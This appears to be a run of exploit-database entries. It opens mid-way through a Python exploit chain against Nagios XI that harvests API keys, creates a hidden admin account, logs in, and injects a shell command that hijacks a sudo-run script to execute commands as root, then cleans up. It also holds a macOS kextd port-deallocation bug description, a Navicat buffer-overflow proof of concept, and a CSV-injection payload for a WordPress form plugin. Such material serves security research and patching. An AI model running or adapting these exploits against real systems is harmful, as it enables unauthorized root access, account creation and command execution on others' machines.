r2_resp = r2.read()
api_keys = parse_apikeys(r2_resp)
random.shuffle(api_keys)
if len(api_keys) > 0:
print "[+] Found {0} unique API keys. Cool:".format(str(len(api_keys)))
for key in api_keys:
print "[+] {0}".format(key)
else:
print "[!] No API keys found! Oh no. Exiting..."
exit()
################################################################
# REQUEST THREE: USE THE API KEY TO ADD AN ADMIN USER
################################################################
print ""
url3 = '/nagiosxi/api/v1/system/user?apikey=XXXAPIKEYLIVESHEREXXX&pretty=1'
headers3 = {'Host' : RHOST,
'Content-Type' : 'application/x-www-form-urlencoded'}
# Generate the sketchiest username possibe :D
sploit_username = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(16))
# And also the worlds best password
sploit_password = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(16))
params3 = urllib.urlencode({
'username':sploit_username,
'password':sploit_password,
'name':'Firsty Lasterson',
'email':'{0}@localhost'.format(sploit_username),
'auth_level':'admin',
'force_pw_change':0
})
print "[+] STEP 3: Using API Keys to add an administrative user..."
found_it = False
for i, key in enumerate(api_keys):
url3_try = url3.replace('XXXAPIKEYLIVESHEREXXX', key)
print "[+] STEP 3: http://{0}{1}".format(RHOST, url3_try)
con3 = httplib.HTTPConnection(RHOST, 80)
con3.set_debuglevel(0)
con3.request("POST", url3_try, params3, headers=headers3)
r3 = con3.getresponse()
r3_contents = r3.read()
if r3.status == 200:
print "[+] STEP 3: Received a 200 Response. That's good!"
if "was added successfully" in r3_contents:
print "[+] STEP 3: User account username:{0} passwd: {1} was added successfully!".format(sploit_username, sploit_password)
print "[+] STEP 3: Moving to Step 4...."
found_it = True
con3.close()
break
else:
"[!] STEP 3: API_KEY access was denied. That's bad."
continue
else:
print "[!] STEP 3: Received a {0} Response. That's bad.".format(str(r2.status))
continue
print "[!] STEP 3: Failed to add a user. Try some more API keys..."
con3.close()
if found_it == False:
print "[!] STEP 3: Step 3 failed.... oh no!"
################################################################
# REQUEST FOUR: LOGIN AS ADMINISTRATIVE USER
################################################################
print ""
print "[+] STEP 4.1: Authenticate as user TODO."
print "[+] STEP 4.1: Get NSP for login..."
url4p1 = '/nagiosxi/login.php'
headers4p1 = {'Host' : RHOST}
params4p1 = ""
con4p1 = httplib.HTTPConnection(RHOST, 80)
con4p1.set_debuglevel(0)
con4p1.request("POST", url4p1, params4p1, headers=headers4p1)
r4p1 = con4p1.getresponse()
r4p1_resp = r4p1.read()
login_nsp = parse_nsp_str(r4p1_resp)
login_nagiosxi = parse_nagiosxi(r4p1.msg)
con4p1.close()
print "[+] STEP 4.1: login_nsp = {0}".format(login_nsp)
print "[+] STEP 4.1: login_nagiosxi = {0}".format(login_nagiosxi)
# 4.2 ---------------------------------------------------------------
print "[+] STEP 4.2: Authenticating..."
url4p2 = '/nagiosxi/login.php'
headers4p2 = {'Host' : RHOST,
'Content-Type' : 'application/x-www-form-urlencoded',
'Cookie' : 'nagiosxi={0}'.format(login_nagiosxi)}
params4p2 = urllib.urlencode({
'nsp':login_nsp,
'page':'auth',
'debug':'',
'pageopt':'login',
'username':sploit_username,
'password':sploit_password,
'loginButton':'',
})
con4p2 = httplib.HTTPConnection(RHOST, 80)
con4p2.set_debuglevel(0)
con4p2.request("POST", url4p2, params4p2, headers=headers4p2)
r4p2 = con4p2.getresponse()
r4p2_resp = r4p2.read()
authed_nagiosxi = parse_nagiosxi(r4p2.msg)
con4p2.close()
print "[+] STEP 4.2: authed_nagiosxi = {0}".format(authed_nagiosxi)
# 4.3 ---------------------------------------------------------------
print "[+] STEP 4.3: Getting an authed nsp token..."
url4p3 = '/nagiosxi/index.php'
headers4p3 = {'Host' : RHOST,
'Content-Type' : 'application/x-www-form-urlencoded',
'Cookie' : 'nagiosxi={0}'.format(authed_nagiosxi)}
params4p3 = ""
con4p3 = httplib.HTTPConnection(RHOST, 80)
con4p3.set_debuglevel(0)
con4p3.request("POST", url4p3, params4p3, headers=headers4p3)
r4p3 = con4p3.getresponse()
r4p3_resp = r4p3.read()
authed_nsp = parse_nsp_str(r4p3_resp)
con4p3.close()
print "[+] STEP 4.3: authed_nsp = {0}".format(authed_nsp)
################################################################
# REQUEST FIVE: Excute command
################################################################
print "[+] STEP 5: Executing command as root!..."
url5 = '/nagiosxi/backend/index.php?'
headers5 = {'Host' : RHOST,
'Content-Type' : 'application/x-www-form-urlencoded',
'Cookie' : 'nagiosxi={0}'.format(authed_nagiosxi)}
privesc_cmd = 'cp /usr/local/nagiosxi/scripts/reset_config_perms.sh /usr/local/nagiosxi/scripts/reset_config_perms.sh.bak && echo "{0}" > /usr/local/nagiosxi/scripts/reset_config_perms.sh && sudo /usr/local/nagiosxi/scripts/reset_config_perms.sh && mv /usr/local/nagiosxi/scripts/reset_config_perms.sh.bak /usr/local/nagiosxi/scripts/reset_config_perms.sh'.format(cmd)
privesc_cmd = "$(" + privesc_cmd + ")"
url5 = url5 + urllib.urlencode({
'cmd':'submitcommand',
'command':'1111',
'command_data':privesc_cmd
})
con5 = httplib.HTTPConnection(RHOST, 80)
con5.set_debuglevel(0)
con5.request("POST", url5, headers=headers5)
r5 = con5.getresponse()
r5_resp = r5.read()
con5.close()
if r5.status == 200:
print "[+] STEP 5: Received a 200 Response. That's good!"
else:
print "[!] STEP 5: Received a {0} Response. That's bad.".format(str(r5.status))
exit()
print "[+] STEP 5: Successfully ran command. We're done?"
################################################################
# REQUEST SIX: Cleanup
################################################################
print "[+] STEP 6: Cleanup time"
r1 = change_db_user('nagiosql', 'n@gweb', '6')
if r1.status == 302:
print "[+] STEP 6: Received a 302 Response. That's good!"
else:
print "[!] STEP 6: Received a {0} Response. That's bad.".format(str(r1.status))
exit()
################################################################
# Solution: Update to a version of NagiosXI >= 5.4.13
################################################################
Here's a kextd method exposed via MIG (com.apple.KernelExtensionServer)
kern_return_t _kextmanager_unlock_kextload(
mach_port_t server,
mach_port_t client)
{
kern_return_t mig_result = KERN_FAILURE;
if (gClientUID != 0) {
OSKextLog(/* kext */ NULL,
kOSKextLogErrorLevel | kOSKextLogIPCFlag,
"Non-root kextutil doesn't need to lock/unlock.");
mig_result = KERN_SUCCESS;
goto finish;
}
if (client != (mach_port_t)dispatch_source_get_handle(_gKextutilLock)) {
OSKextLog(/* kext */ NULL,
kOSKextLogErrorLevel | kOSKextLogIPCFlag,
"%d not used to lock for kextutil.", client);
goto finish;
}
removeKextutilLock();
mig_result = KERN_SUCCESS;
finish:
// we don't need the extra send right added by MiG
mach_port_deallocate(mach_task_self(), client);
return mig_result;
}
If the client has UID 0 but passes an invalid client port this code will
drop a UREF on client port then return KERN_FAILURE.
Returning KERN_FAILURE in MIG means all resources will be released which will
cause client to be passed to mach_port_deallocate again, even though only
one UREF was taken.
You'll have to use a debugger attached to kextd to see this behaviour.
This class of bug is exploitable; please see the writeup for mach_portal from 2016
where I exploited a similar issue [https://bugs.chromium.org/p/project-zero/issues/detail?id=959]
The TL;DR is that an attacker can drop an extra UREF on any send rights in kextd for which the
attacker also has a send right; you could use this to cause a name for a privileged service
to be deallocated then cause the name to be reused to name a port you control.
Exploitation of this would be a privesc from unentitled root to root with
com.apple.rootless.kext-management and com.apple.rootless.storage.KernelExtensionManagement entitlements,
which at least last time I looked was equal to kernel code execution.
tested on MacOS 10.13.2
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44561.zip
#!/usr/bin/python
# Title: Navicat < 12.0.27 Oracle Connection Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.navicat.com
# Date: 27/04/2018
# Version: 12.0.26
# Tested on Windows 7 32-bit
# Vendor notified on 04/04/2018. Patch issued on 25/04/2018.
# Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow.
filename="navicatPOC.txt"
junk = "A" * 1502
#nseh = "\x4C\x4C\x77\x04"
#seh= "\x75\x2a\x01\x10"
nseh = "B" * 4
seh = "C" * 4
fill = "D" * 4000
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: Wordpress Plugin Form Maker version 1.12.20 vulnerable to to Formula Injection (CSV Injection)
# Google Dork: N/A
# Date: 27-04-2018
################################
# Exploit Author: Jetty Sairam
################################
# Software Link: https://wordpress.org/plugins/form-maker/
# Affected Version: 1.12.20 and before
#Category: Plugins and Extensions
# Tested on: WiN7_x64
# CVE : CVE-2018-10504
1. Application Description:
Form Maker provides a framework to build custom forms for Joomla users.
2. Technical Description:
Custom Forms version 1.12.20 is affected by the vulnerability Remote Command Execution using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with higher privilege exports the form data in CSV opens the file on their machine, the command is executed.
3. Proof Of Concept:
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
When high privileged user logs into the application to export form data in CSV and opens the file.
Formula gets executed and calculator will get popped in his machine.
4. Solution:
Upgrade to version 1.12.24
https://wordpress.org/plugins/form-maker/
5. Reference:
https://wordpress.org/plugins/form-maker/#developers